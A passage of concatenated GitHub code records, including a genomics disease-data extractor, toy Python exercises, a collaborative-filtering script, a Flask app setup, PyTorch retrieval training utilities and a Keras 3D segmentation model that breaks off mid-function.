get_disease_record(diseaseRecord, dataProvider, dateProduced, release, allelicGeneId):\n\n fishEnvId = None\n conditions = None\n qualifier = None\n publicationModId = None\n pubMedId = None\n\n diseaseObjectType = diseaseRecord['objectRelation'].get(\"objectType\")\n\n primaryId = diseaseRecord.get('objectId')\n\n if 'qualifier' in diseaseRecord:\n qualifier = diseaseRecord.get('qualifier')\n if qualifier is None:\n if 'evidence' in diseaseRecord:\n\n publicationModId = \"\"\n pubMedId = \"\"\n pubModUrl = None\n pubMedUrl = None\n diseaseAssociationType = None\n ecodes = []\n\n evidence = diseaseRecord.get('evidence')\n if 'publication' in evidence:\n if 'modPublicationId' in evidence['publication']:\n publicationModId = evidence['publication'].get('modPublicationId')\n localPubModId = publicationModId.split(\":\")[1]\n pubModUrl = get_complete_pub_url(localPubModId, publicationModId)\n if 'pubMedId' in evidence['publication']:\n pubMedId = evidence['publication'].get('pubMedId')\n localPubMedId = pubMedId.split(\":\")[1]\n pubMedUrl = get_complete_pub_url(localPubMedId, pubMedId)\n\n if 'objectRelation' in diseaseRecord:\n diseaseAssociationType = diseaseRecord['objectRelation'].get(\"associationType\")\n\n additionalGeneticComponents = []\n if 'additionalGeneticComponents' in diseaseRecord['objectRelation']:\n for component in diseaseRecord['objectRelation']['additionalGeneticComponents']:\n componentSymbol = component.get('componentSymbol')\n componentId = component.get('componentId')\n componentUrl = component.get('componentUrl') + componentId\n additionalGeneticComponents.append(\n {\"id\": componentId, \"componentUrl\": componentUrl, \"componentSymbol\": componentSymbol}\n )\n\n if 'evidenceCodes' in diseaseRecord['evidence']:\n ecodes = diseaseRecord['evidence'].get('evidenceCodes')\n\n if 'experimentalConditions' in diseaseRecord:\n conditionId = \"\"\n for condition in diseaseRecord['experimentalConditions']:\n if 'textCondition' in condition:\n if dataProvider == 'ZFIN':\n conditionId = conditionId + condition.get('textCondition')\n # if condition != None:\n conditions = diseaseRecord.get('experimentalConditions')\n if dataProvider == 'ZFIN':\n fishEnvId = primaryId + conditionId\n\n # TODO: get SGD to fix their disease file.\n if diseaseRecord.get('taxonId') == 'taxon:559292':\n taxonId = \"NCBITaxon:559292\"\n else:\n taxonId = diseaseRecord.get('taxonId')\n\n disease_feature = {\n \"primaryId\": primaryId,\n \"diseaseObjectName\": diseaseRecord.get('objectName'),\n \"diseaseObjectType\": diseaseObjectType,\n \"taxonId\": taxonId,\n \"diseaseAssociationType\": diseaseRecord['objectRelation'].get(\"associationType\"),\n \"with\": diseaseRecord.get('with'),\n \"doId\": diseaseRecord.get('DOid'),\n \"pubMedId\": pubMedId,\n \"pubMedUrl\": pubMedUrl,\n \"pubModId\": publicationModId,\n \"pubModUrl\": pubModUrl,\n \"pubPrimaryKey\": pubMedId + publicationModId,\n \"release\": release,\n \"dataProvider\": dataProvider,\n \"relationshipType\": diseaseAssociationType,\n \"dateProduced\": dateProduced,\n \"qualifier\": qualifier,\n \"doDisplayId\": diseaseRecord.get('DOid'),\n \"doUrl\": \"http://www.disease-ontology.org/?id=\" + diseaseRecord.get('DOid'),\n \"doPrefix\": \"DOID\",\n # doing the typing in neo, but this is for backwards compatibility in ES\n \"ecodes\": ecodes,\n \"definition\": diseaseRecord.get('definition'),\n \"inferredGene\": diseaseRecord.get('objectRelation').get('inferredGeneAssociation'),\n \"experimentalConditions\": conditions,\n \"fishEnvId\": fishEnvId,\n \"additionalGeneticComponents\": additionalGeneticComponents,\n \"uuid\": str(uuid.uuid4()),\n \"loadKey\": dataProvider + \"_\" + dateProduced + \"_Disease\",\n \"allelicGeneId\": allelicGeneId\n }\n return disease_feature\n\n\ndef get_complete_pub_url(local_id, global_id):\n complete_url = None\n\n if 'MGI' in global_id:\n complete_url = 'http://www.informatics.jax.org/accession/' + global_id\n if 'RGD' in global_id:\n complete_url = 'http://rgd.mcw.edu/rgdweb/search/search.html?term=' + local_id\n if 'SGD' in global_id:\n complete_url = 'http://www.yeastgenome.org/reference/' + local_id\n if 'FB' in global_id:\n complete_url = 'http://flybase.org/reports/' + local_id + '.html'\n if 'ZFIN' in global_id:\n complete_url = 'http://zfin.org/' + local_id\n if 'WB:' in global_id:\n complete_url = 'http://www.wormbase.org/db/misc/paper?name=' + local_id\n if 'PMID:' in global_id:\n complete_url = 'https://www.ncbi.nlm.nih.gov/pubmed/' + local_id\n\n return complete_url\n","repo_name":"yeastgenome/AGR_POC","sub_path":"LOADER/agr_loader-develop/src/extractors/disease_ext.py","file_name":"disease_ext.py","file_ext":"py","file_size_in_byte":6180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"42033062604","text":"# modules/product.py\nimport random\n\n\nclass Product:\n '''\n\n '''\n def __init__(self, name, price = 10, weight = 20, flammability = 0.5,\n identifier = random.randint(1000000, 9999999)):\n self.name = name\n self.price = price\n self.weight = weight\n self.flammability = flammability\n self.identifier = identifier\n\n def stealability(self):\n stealable = self.price / self.weight\n\n if stealable < 0.5:\n print(\"Not so stealable\")\n elif stealable >= 0.5 and stealable < 1.0:\n print(\"Kinda stealable\")\n else:\n print(\"Very stealable\")\n\n def explode(self):\n explodable = self.flammability * self.weight\n\n if explodable < 10:\n print(\"...fizzle.\")\n elif explodable >= 10 and explodable < 50:\n print(\"...boom!\")\n else:\n print(\"...BABOOM!!\")\n\nclass BoxingGlove(Product):\n def __int__(self, name, price = 10, weight = 10, flammability = 0.5,\n identifier = random.randint(1000000, 9999999)):\n super().__init__(name=name, price=price, weight=weight,\n flammability=flammability, identifier=identifier)\n\n\n\n def explode(self):\n print(\"...it's a glove.\")\n\n def punch(self):\n weight_glove = self.weight\n\n if weight_glove < 5:\n print(\"That tickles.\")\n elif weight_glove >=5 and weight_glove < 15:\n print(\"Hey that hurt!\")\n else:\n print(\"OUCH!\")\n","repo_name":"nimu77/sprint_challenge","sub_path":"modules/acme.py","file_name":"acme.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"8484238025","text":"#!/usr/bin/env python\n# coding=utf-8\n\n\"\"\"MDDatePicker Test.\"\"\"\n\nfrom datetime import datetime\nfrom django import setup\nfrom django.test import TestCase\nfrom djextra.forms.angular1.widgets import MDDatePicker\n\n\nsetup()\n\n\nclass SimpleMDDatePickerTest(TestCase):\n \"\"\"Simple MDDatePicker test.\"\"\"\n\n def setUp(self):\n \"\"\"Setup.\"\"\"\n self.widget = MDDatePicker()\n\n def test_render(self):\n \"\"\"The generated content should be correct.\"\"\"\n result = str(self.widget.render(\"result\", None)).replace(\"\\n\", \"\")\n data = (\n \"\"\n \"\"\n )\n self.assertEqual(result, data)\n\n def test_render_has_value(self):\n \"\"\"The generated content should be correct.\"\"\"\n now = datetime.utcnow().isoformat()\n result = str(self.widget.render(\"result\", now)).replace(\"\\n\", \"\")\n data = (\n f\"\"\n \"\"\n )\n self.assertEqual(result, data)\n","repo_name":"hiroaki-yamamoto/djextra","sub_path":"tests/angular1/widgets/test_md_datepicker.py","file_name":"test_md_datepicker.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"32177550894","text":"import sys\n\nN = int(sys.stdin.readline())\ncircles = []\n\nfor _ in range(N):\n x, r = map(int, sys.stdin.readline().split())\n circles.append([(x - r), 'L'])\n circles.append([(x + r), 'R'])\n\ncircles.sort(key=lambda x : (-x[0], x[1]), reverse=True)\n\nstack = []\nans = 1 # 기본 1개\n\nfor cir in circles:\n if cir[1] == 'L':\n stack.append(cir)\n else:\n total_len = 0\n while stack and stack[-1][1] != 'L':\n total_len += stack.pop()[0]\n\n if total_len == cir[0] - stack[-1][0]:\n ans += 2\n else:\n ans += 1\n stack.append([cir[0] - stack.pop()[0], 'C'])\n\nprint(ans)","repo_name":"fredkeemhaus/TIL","sub_path":"backjoon/10000/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"16975357453","text":"#1 gcd\n#Euclidean Algorithm\ndef gcd(a, b):\n if b == 0:\n return a\n else:\n return gcd(b, a % b)\n\nprint(gcd(1071,462))\n\n\n#pascal triangle:\ndef pastri(x: int): #x is the number of rows\n ele = lambda a, b: 1 if b in (0, a) else ele(a - 1, b - 1) + ele(a - 1, b)\n #ele is a lambda func to find the b-th element of row a\n lastlst = []\n for k in range(x + 1):\n lastlst.append(str(ele(x, k)))\n a = ' '.join(lastlst)\n #get the last row for displaying purpose\n for i in range(x):\n lst = []\n for k in range(i +1):\n lst.append(str(ele(i, k)))\n #convert ele from int to str to use join and center\n print(' '.join(lst).center(len(a)))\n print()\n\npastri(6)\n","repo_name":"doandanhtu/pythonbasic","sub_path":"Function/recursionHW.py","file_name":"recursionHW.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"42434811411","text":"import pandas as pd\nimport numpy as np\nimport pickle\n\n\n# 保存每个用户的相似用户数\nnumber_similar_item = 20\n\nftest = open('D:\\\\CCIR2018\\\\itemCF\\\\user_answer_train.txt', 'rb') # 直接在user_answer_train.txt中建立答案相似性\nuser_answer_train = pickle.load(ftest)\nftrain = open('D:\\\\CCIR2018\\\\itemCF\\\\answer_user_train.txt', 'rb')\nanswer_user_train = pickle.load(ftrain)\n\nftest.close()\nftrain.close()\n\n\nprint(len(user_answer_train))\n\nimport math\nimport time\n# 用字典保存相似答案\nsimilarity = {}\nfor user, answers in user_answer_train.items():\n start = time.clock()\n list1 = list(answers.keys())\n len1 = len(list1)\n for i in range(0, len1):\n for j in range(i+1, len1):\n # print(type(list1))\n a = list1[i]\n b = list1[j]\n if a < b:\n similarity.setdefault(list1[i], {})\n similarity[list1[i]].setdefault(list1[j], 0)\n similarity[list1[i]][list1[j]] += 1\n else:\n similarity.setdefault(list1[j], {})\n similarity[list1[j]].setdefault(list1[i], 0)\n similarity[list1[j]][list1[i]] += 1\n print(time.clock() - start)\n\nfor answer1, related_answers in similarity.items():\n for answer2, count in related_answers.items():\n similarity[answer1][answer2] = count/math.sqrt(len(answer_user_train[answer1])*len(answer_user_train[answer2]))\n\n\n\nf = open('D:\\\\CCIR2018\\\\itemCF\\\\item_similarity_matrix.txt', 'wb')\npickle.dump(similarity, f)\nf.close()\n\n\nprint(len(similarity))\nprint(\"相似答案已生成!!!\")\n\n","repo_name":"littleluck/CCIR-2018","sub_path":"itemCF/item_similarity2.py","file_name":"item_similarity2.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"4838368043","text":"from flask import Flask, render_template\nfrom flask_sqlalchemy import SQLAlchemy\nfrom os.path import exists\nfrom flask_login import LoginManager\n\ndb = SQLAlchemy()\napp = Flask(__name__)\n\ndef index():\n app.config[\"SECRET_KEY\"] = \"5fsyuadigohkfg\\g54d1fsggrteG45wtref4ad567f89gohp[\"\n app.config[\"SQLALCHEMY_DATABASE_URI\"] = \"sqlite:///database.db\"\n app.config[\"SQLALCHEMY_TRACK_MODIFICATIONS\"] = True\n db.init_app(app)\n from .routes import routes\n from .auth import auth\n app.register_blueprint(routes, url_prefix=\"/\")\n app.register_blueprint(auth, url_prefix=\"/\")\n from .models import UserData, UserPosts\n createDataBase(app)\n login_manager = LoginManager()\n login_manager.login_view = \"auth.login\"\n login_manager.init_app(app)\n\n @login_manager.user_loader\n def load_user(id):\n return UserData.query.get(int(id))\n\n return app\n\ndef createDataBase(app):\n if not exists(\"website/database.db\"):\n db.create_all(app=app)\n","repo_name":"Yash2003Bisht/BlogAppUsingFlask","sub_path":"website/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"74756048894","text":"import datetime\n\nfrom nazgul.action import DriverAction\nfrom nazgul.constants import CHECKIN, CHECKOUT\nfrom nazgul.models.datastore import list_objects, create\n\n\nclass Action(DriverAction):\n action_name = \"Registrar entradas y salidas\"\n\n message = None\n\n triggers = ['r', 'registrar', \"hola\", \"hola!\", \"adios\", \"adios!\"]\n\n @property\n def help(self):\n return \"teclea 'r', 'R' o 'registrar' para registrar entrada y salida automáticamente\"\n\n def response(self):\n results = list_objects(user=self.message.user_id)\n if len(results) > 0 and results[0][\"type\"] == CHECKIN:\n type_record = CHECKOUT\n message_1 = \"Hasta luego\"\n message_2 = \"Salida registrada\"\n else:\n message_1 = \"Buenas\"\n type_record = CHECKIN\n message_2 = \"Entrada registrada\"\n\n create({\"user\": self.message.user_id, \"username\": self.message.user, \"type\": type_record,\n \"timestamp\": datetime.datetime.now()})\n return '{}. {}'.format(message_1, message_2)\n","repo_name":"avara1986/nazgul","sub_path":"nazgul/actions/a0010_record_time/a0010_record_time.py","file_name":"a0010_record_time.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"1368257207","text":"import sys\nfrom timeit import default_timer as timer\n\nimport torch\nfrom torch.utils.data import Dataset\nimport numpy as np\n\n\nclass ImageCaptionDataset(Dataset):\n def __init__(self, pairs_dataset, cap_encodings):\n super(ImageCaptionDataset, self).__init__()\n self.pairs_dataset = pairs_dataset\n self.cap_encodings = cap_encodings\n\n def __len__(self):\n return len(self.pairs_dataset)\n\n def __getitem__(self, i):\n anchor, _ = self.pairs_dataset[i]\n # pos_enc = self.cap_encodings[i][random.randint(0, len(self.cap_encodings[i])-1)]\n pos_enc = self.cap_encodings[i][0]\n\n return anchor, pos_enc\n\n\ndef train_for_classification(net, train_loader, test_loader, optimizer, \n criterion, lr_scheduler=None,\n epochs=1, reports_every=1, device='cuda'):\n net.to(device)\n total_train = len(train_loader.dataset)\n total_test = len(test_loader.dataset)\n tiempo_epochs = 0\n train_loss, train_acc, test_acc = [], [], []\n\n for e in range(1,epochs+1): \n inicio_epoch = timer()\n \n # Aseguramos que todos los parámetros se entrenarán usando .train()\n net.train()\n\n # Variables para las métricas\n running_loss, running_acc = 0.0, 0.0\n\n for i, data in enumerate(train_loader):\n # Desagregamos los datos y los pasamos a la GPU\n X, Y = data\n X, Y = X.to(device), Y.to(device)\n\n # Limpiamos los gradientes, pasamos el input por la red, calculamos\n # la loss, ejecutamos el backpropagation (.backward) \n # y un paso del optimizador para modificar los parámetros\n optimizer.zero_grad()\n\n out_dict = net(X)\n Y_logits = out_dict['logits']\n loss = criterion(Y_logits, Y)\n\n # Si hay logits auxiliares considéralos en la loss promediando\n # loss calculada para cada logit (incluyendo el anterior ya calculado)\n if 'aux_logits' in out_dict:\n aux_logits_list = out_dict['aux_logits']\n N = len(aux_logits_list)\n for aux_logits in aux_logits_list:\n loss += criterion(aux_logits, Y)\n loss /= (N + 1)\n\n \n loss.backward()\n optimizer.step()\n\n # loss\n items = min(total_train, (i+1) * train_loader.batch_size)\n running_loss += loss.item()\n avg_loss = running_loss/(i+1)\n \n # accuracy\n _, max_idx = torch.max(Y_logits, dim=1)\n running_acc += torch.sum(max_idx == Y).item()\n avg_acc = running_acc/items*100\n\n # report\n sys.stdout.write(f'\\rEpoch:{e}({items}/{total_train}), ' \n + (f'lr:{lr_scheduler.get_last_lr()[0]:02.7f}, ' if lr_scheduler is not None else '')\n + f'Loss:{avg_loss:02.5f}, '\n + f'Train Acc:{avg_acc:02.1f}%')\n \n tiempo_epochs += timer() - inicio_epoch\n\n if e % reports_every == 0:\n sys.stdout.write(', Validating...')\n train_loss.append(avg_loss)\n train_acc.append(avg_acc)\n net.eval()\n running_acc = 0.0\n for i, data in enumerate(test_loader):\n X, Y = data\n X, Y = X.to(device), Y.to(device)\n Y_logits = net(X)['logits']\n _, max_idx = torch.max(Y_logits, dim=1)\n running_acc += torch.sum(max_idx == Y).item()\n avg_acc = running_acc/total_test*100\n test_acc.append(avg_acc)\n sys.stdout.write(f', Val Acc:{avg_acc:02.2f}%, '\n + f'Avg-Time:{tiempo_epochs/e:.3f}s.\\n')\n else:\n sys.stdout.write('\\n')\n\n if lr_scheduler is not None:\n lr_scheduler.step()\n\n return train_loss, (train_acc, test_acc)\n \ndef l2norm(x):\n norm = np.linalg.norm(x, axis=1, keepdims=True)\n return 1.0 * x / norm\n\n\ndef compute_ranks_x2y(x, y):\n dists = torch.cdist(x.unsqueeze(0), y.unsqueeze(0), p=2).squeeze(0)\n ranks = torch.zeros(dists.shape[0])\n for i in range(len(ranks)):\n d_i = dists[i,:]\n inds = torch.argsort(d_i)\n rank = torch.where(inds == i)[0][0]\n ranks[i] = rank\n return ranks\n\n\ndef train_for_retrieval(img_net, text_net, train_loader, test_loader, optimizer, \n criterion, lr_scheduler=None, epochs=1, reports_every=1, \n device='cuda', norm=True):\n img_net.to(device)\n text_net.to(device)\n\n total_train = len(train_loader.dataset)\n total_test = len(test_loader.dataset)\n tiempo_epochs = 0\n train_loss, train_meanrr, test_meanrr, train_r10, test_r10 = [], [], [], [], []\n\n for e in range(1,epochs+1):\n inicio_epoch = timer()\n\n # Aseguramos que todos los parámetros se entrenarán usando .train()\n img_net.train()\n text_net.train()\n\n # Variables para las métricas\n running_loss, running_meanrr, running_r10 = 0.0, 0.0, 0.0\n\n for i, data in enumerate(train_loader):\n # Desagregamos los datos y los pasamos a la GPU\n a, p = data\n if norm:\n a, p = l2norm(a), l2norm(p)\n a, p = a.to(device), p.to(device)\n\n # Limpiamos los gradientes, pasamos el input por la red, calculamos\n # la loss, ejecutamos el backpropagation (.backward) \n # y un paso del optimizador para modificar los parámetros\n optimizer.zero_grad()\n\n a_enc = img_net(a)['logits']\n p_enc = text_net(p)['logits']\n\n loss = criterion(a_enc, p_enc)\n loss.backward()\n optimizer.step()\n\n # loss\n items = min(total_train, (i+1) * train_loader.batch_size)\n running_loss += loss.item()\n avg_loss = running_loss/(i+1)\n\n # mean-rank\n ranks = compute_ranks_x2y(a_enc, p_enc)\n # running_meanr += (ranks.mean()/len(a))\n running_meanrr += (torch.reciprocal(ranks+1).mean())\n avg_meanrr = running_meanrr/(i+1)\n\n # recall at 10\n r10 = 100.0 * len(torch.where(ranks < 10)[0]) / len(ranks)\n running_r10 += r10\n avg_r10 = running_r10/(i+1)\n\n # report\n sys.stdout.write(f'\\rEpoch:{e}({items}/{total_train}), '\n + (f'lr:{lr_scheduler.get_last_lr()[0]:02.7f}, ' if lr_scheduler is not None else '')\n + f'Loss:{avg_loss:02.5f}, '\n + f'Train MRR:{avg_meanrr:02.2f} '\n + f'R@10:{avg_r10:02.2f}%')\n \n tiempo_epochs += timer() - inicio_epoch\n\n if e % reports_every == 0:\n sys.stdout.write(', Validating...')\n train_loss.append(avg_loss)\n train_meanrr.append(avg_meanrr)\n train_r10.append(avg_r10)\n\n img_net.eval()\n text_net.eval()\n\n running_meanrr, running_r10 = 0.0, 0.0\n for i, data in enumerate(test_loader):\n a, p = data\n a, p = a.to(device), p.to(device)\n\n a_enc = img_net(a)['logits']\n p_enc = text_net(p)['logits']\n\n # mean-rank\n ranks = compute_ranks_x2y(a_enc, p_enc)\n # running_meanrr += (ranks.mean()/len(a))\n running_meanrr += (torch.reciprocal(ranks+1).mean())\n\n # recall at 10\n r10 = 100.0 * len(torch.where(ranks < 10)[0]) / len(ranks)\n running_r10 += r10\n\n avg_meanrr = running_meanrr/len(test_loader)\n avg_r10 = running_r10/len(test_loader)\n\n test_meanrr.append(avg_meanrr)\n test_r10.append(avg_r10)\n sys.stdout.write(f'MRR:{avg_meanrr:02.2f} '\n + f'R@10:{avg_r10:02.2f}% '\n + f'Avg-Time:{tiempo_epochs/e:.3f}s.\\n')\n else:\n sys.stdout.write('\\n')\n\n if lr_scheduler is not None:\n lr_scheduler.step()\n\n return train_loss, (train_meanrr, test_meanrr), (train_r10, test_r10)\n","repo_name":"dccuchile/CC6204","sub_path":"2020/tareas/tarea4/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7403,"program_lang":"python","lang":"en","doc_type":"code","stars":170,"dataset":"github-code","pt":"79"} +{"seq_id":"27148523262","text":"from keras import layers, models,Model\nfrom keras import backend as K\nfrom keras.initializers import RandomNormal,Constant\nfrom keras.layers import Conv3D,Reshape,Add,LeakyReLU,Multiply,Lambda,GlobalAveragePooling3D,Average,Dense,multiply,Maximum,Subtract,UpSampling3D,AveragePooling3D,concatenate,Permute,Input,BatchNormalization,add,Conv3DTranspose,Activation,MaxPooling3D,Dropout\nK.set_image_data_format('channels_last')\nimport tensorflow as tf\nfrom attention import PAM\ndef BatchActivate(x):\n x = BatchNormalization()(x)\n# x = Activation('relu')(x)\n x = LeakyReLU(0.2)(x)\n return x\n\ndef res_block(x, nb_filters, strides):\n\tres_path = BatchActivate(x)\n\tres_path = Conv3D(filters=nb_filters[0], kernel_size=(3, 3, 3), padding='same', strides=strides[0], kernel_initializer='he_normal')(res_path)\n\tres_path = BatchActivate(res_path)\n\tres_path = Conv3D(filters=nb_filters[1], kernel_size=(3, 3 ,3), padding='same', strides=strides[1],kernel_initializer='he_normal')(res_path)\n\n\tshortcut = Conv3D(nb_filters[1], kernel_size=(1, 1, 1), strides=strides[0],kernel_initializer='he_normal')(x)\n\n\tres_path = add([shortcut, res_path])\n\treturn res_path\n\n\ndef encoder(x):\n to_decoder = []\n\n main_path = Conv3D(filters=16, kernel_size=(3, 3, 3), padding='same', strides=(1, 1, 1),kernel_initializer='he_normal')(x)\n main_path = BatchActivate(main_path)\n\n main_path = Conv3D(filters=16, kernel_size=(3, 3, 3), padding='same', strides=(1, 1, 1),kernel_initializer='he_normal')(main_path)\n\n shortcut = Conv3D(filters=16, kernel_size=(1, 1, 1), strides=(1, 1, 1),kernel_initializer='he_normal')(x)\n\n main_path = add([shortcut, main_path])\n # first branching to decoder\n to_decoder.append(main_path)\n\n main_path = res_block(main_path, [32, 32], [(2, 2,2), (1,1, 1)])\n to_decoder.append(main_path)\n\n main_path = res_block(main_path, [64, 64], [(2, 2,2), (1, 1,1)])\n to_decoder.append(main_path)\n\n\n main_path = res_block(main_path, [128, 128], [(2, 2, 2), (1, 1, 1)])\n to_decoder.append(main_path)\n\n return to_decoder\n\n\n\n\n\n\ndef decoder(x, from_encoder,from_encoderF):\n main_path = UpSampling3D(size=(2, 2, 2))(x)\n main_path = concatenate([main_path, from_encoderF[3],from_encoder[3]], axis=-1)\n main_path = res_block(main_path, [128, 128], [(1, 1,1), (1,1, 1)])\n\n main_path = UpSampling3D(size=(2, 2, 2))(main_path)\n main_path = concatenate([main_path, from_encoderF[2],from_encoder[2]], axis=-1)\n main_path = res_block(main_path, [64, 64], [(1, 1,1), (1, 1,1)])\n\n main_path = UpSampling3D(size=(2, 2, 2))(main_path)\n main_path = concatenate([main_path, from_encoderF[1],from_encoder[1]], axis=-1)\n main_path = res_block(main_path, [32, 32], [(1, 1,1), (1, 1,1)])\n\n\n main_path = UpSampling3D(size=(2, 2, 2))(main_path)\n main_path = concatenate([main_path, from_encoderF[0], from_encoder[0]], axis=-1)\n main_path = res_block(main_path, [16, 16], [(1, 1, 1), (1, 1, 1)])\n\n return main_path\n\ndef res_block_attention(x, filter):\n\tres_path = Conv3D(filters=filter, kernel_size=(3, 3, 3), padding='same',kernel_initializer='he_normal')(x)\n\tres_path = BatchActivate(res_path)\n\tres_path = Conv3D(filters=filter, kernel_size=(3, 3 ,3), padding='same',activation='relu',kernel_initializer='he_normal')(res_path)\n\tshortcut = Conv3D(filter, kernel_size=(1, 1, 1))(x)\n\tshortcut = LeakyReLU(0.2)(shortcut)\n\tres_path = add([shortcut, res_path])\n\treturn res_path\n\ndef my_attention(X,Y,Z):\n #X某一类组织\n # Y 背景\n #Z T1图像\n x0 = concatenate([X,Z],axis=-1)\n x1 = res_block_attention(x0, 32)\n x2 = res_block_attention(x1,32)\n x3 = Conv3D(1,kernel_size=(1,1,1),padding='same',activation='sigmoid')(x2)\n ##Self-strengh part\n x4 = Lambda(lambda x: 1+x)(x3)\n x5 = Multiply()([x4,X])\n ## BG-strength part\n y1 = Lambda(lambda x: 2-x)(Y)\n y2 =Multiply()([y1,x3])\n z = add([x5,y2])\n z = res_block_attention(z, 32)\n #k = Conv3D(1, kernel_size=(1, 1, 1), padding='same', activation='sigmoid')(z)\n return z\n\ndef SAM(F1,F2,filter):\n ##F1为encoder路径的特征图\n ##F2为decoder路径的特征图\n ##filter为encoder路径的大小\n Max = MaxPooling3D()(F2)\n Avg = AveragePooling3D()(F2)\n MA = concatenate([Max,Avg],axis=-1)\n d3 = Conv3D(filter,kernel_size=(3,3,3),dilation_rate=(1,1,1),activation='relu',padding='same',kernel_initializer=RandomNormal(mean=0.0, stddev=1e-5))(MA)\n d5 = Conv3D(filter,kernel_size=(3,3,3),dilation_rate=(2,2,2),activation='relu',padding='same',kernel_initializer=RandomNormal(mean=0.0, stddev=1e-5))(MA)\n d7 = Conv3D(filter,kernel_size=(3,3,3),dilation_rate=(5,5,5),activation='relu',padding='same',kernel_initializer=RandomNormal(mean=0.0, stddev=1e-5))(MA)\n d = concatenate([d3,d5,d7],axis=-1)\n du = UpSampling3D((2,2,2))(d)\n A2 = Conv3D(filter,kernel_size=(1,1,1),activation='sigmoid',padding='same',kernel_initializer=RandomNormal(mean=0.0, stddev=1e-5))(du)\n A = multiply([A2,F1])\n return A\n\n\ndef mutil_scale_decoder(x, from_encoder,from_encoderF):\n main_path1 = UpSampling3D(size=(2, 2, 2))(x)\n main_path11 = concatenate([main_path1, from_encoderF[3],from_encoder[3]], axis=-1)\n main_path111 = SAM(main_path1,main_path11,256)\n main_path1 = res_block(main_path111, [128, 128], [(1, 1,1), (1,1, 1)]) #8,8,8,128\n\n main_path2 = UpSampling3D(size=(2, 2, 2))(main_path1)\n main_path22 = concatenate([main_path2, from_encoderF[2],from_encoder[2]], axis=-1)\n main_path2 = SAM(main_path2, main_path22, 128)\n main_path2 = res_block(main_path2, [64, 64], [(1, 1,1), (1, 1,1)]) #16,16,16,64\n\n main_path3 = UpSampling3D(size=(2, 2, 2))(main_path2)\n main_path33 = concatenate([main_path3, from_encoderF[1],from_encoder[1]], axis=-1)\n main_path3 = SAM(main_path3, main_path33, 64)\n main_path3 = res_block(main_path3, [32, 32], [(1, 1,1), (1, 1,1)]) #32,32,32,32\n\n\n main_path4 = UpSampling3D(size=(2, 2, 2))(main_path3)\n main_path44 = concatenate([main_path4, from_encoderF[0], from_encoder[0]], axis=-1)\n main_path4 = SAM(main_path4, main_path44, 32)\n main_path4 = res_block(main_path4, [16, 16], [(1, 1, 1), (1, 1, 1)]) #64,64,64,16\n\n return main_path1,main_path2,main_path3,main_path4\n\n\ndef ResNetR3_attention_mutil_scale(input_shape, input_shape1,input_shape2,input_shape3,input_shape4):\n\n inputs = Input(shape=input_shape) #T1\n I = Conv3D(16, kernel_size=(3, 3, 3), padding='same', kernel_initializer='he_normal')(inputs)\n I = LeakyReLU(0.2)(I)\n inputs1 = Input(shape=input_shape1)\n I1 = Conv3D(16, kernel_size=(3, 3, 3), padding='same', kernel_initializer='he_normal')(inputs1)\n I1 = LeakyReLU(0.2)(I1)\n inputs2 = Input(shape=input_shape2)\n I2 = Conv3D(16, kernel_size=(3, 3, 3), padding='same', kernel_initializer='he_normal')(inputs2)\n I2 = LeakyReLU(0.2)(I2)\n inputs3 = Input(shape=input_shape3)\n I3 = Conv3D(16, kernel_size=(3, 3, 3), padding='same', kernel_initializer='he_normal')(inputs3)\n I3 = LeakyReLU(0.2)(I3)\n inputs4 = Input(shape=input_shape4)\n I4 = Conv3D(16, kernel_size=(3, 3, 3), padding='same', kernel_initializer='he_normal')(inputs4)\n I4 = LeakyReLU(0.2)(I4)\n inputsF = concatenate([I1,I2,I3,I4],axis=-1)\n to_decoder1 = encoder(I)\n to_decoder2 = encoder(inputsF)\n to_decoder3 = concatenate([to_decoder1[3],to_decoder2[3]],axis=-1)\n path1 = res_block(to_decoder3, [256, 256], [(2, 2, 2), (1, 1, 1)])\n path1, path2, path3, path4 = mutil_scale_decoder(path1, from_encoder=to_decoder1,from_encoderF=to_decoder2)\n\n x001 = Conv3DTranspose(16,kernel_size=(1,1,1), activation='relu', strides=(8,8,8), kernel_initializer='he_normal',bias_initializer=Constant(value=-10))(path1)\n x001 = res_block_attention(x001,32)\n x8 = Conv3D(5, kernel_size=(1, 1, 1), activation='softmax',name='output8', kernel_initializer='he_normal',bias_initializer=Constant(value=-10))(x001)\n\n x002 = Conv3DTranspose(16,kernel_size=(1,1,1), activation='relu', strides=(4,4,4), kernel_initializer='he_normal',bias_initializer=Constant(value=-10))(path2)\n x002 = res_block_attention(x002,32)\n x16 = Conv3D(5, kernel_size=(1, 1, 1), activation='softmax',name='output16', kernel_initializer='he_normal',bias_initializer=Constant(value=-10))(x002)\n\n x003 = Conv3DTranspose(16,kernel_size=(1,1,1), activation='relu', strides=(2,2,2), kernel_initializer='he_normal',bias_initializer=Constant(value=-10))(path3)\n x003 = res_block_attention(x003,32)\n x32 = Conv3D(5, kernel_size=(1, 1, 1), activation='softmax',name='output32', kernel_initializer='he_normal',bias_initializer=Constant(value=-10))(x003)\n\n x64 = Conv3D(5, kernel_size=(1, 1, 1), activation='softmax', name='output64', kernel_initializer='he_normal',bias_initializer=Constant(value=-10))(path4)\n x = concatenate([x8,x16,x32,x64],axis=-1)\n x = res_block_attention(x,64)\n x = Conv3D(5, kernel_size=(1, 1, 1), activation='softmax', name='output1', kernel_initializer='he_normal',bias_initializer=Constant(value=-10))(x)\n\n BK = Lambda(lambda x: x[...,0:1])(x)\n y_tumors = Lambda(lambda x: x[...,1:2])(x)\n 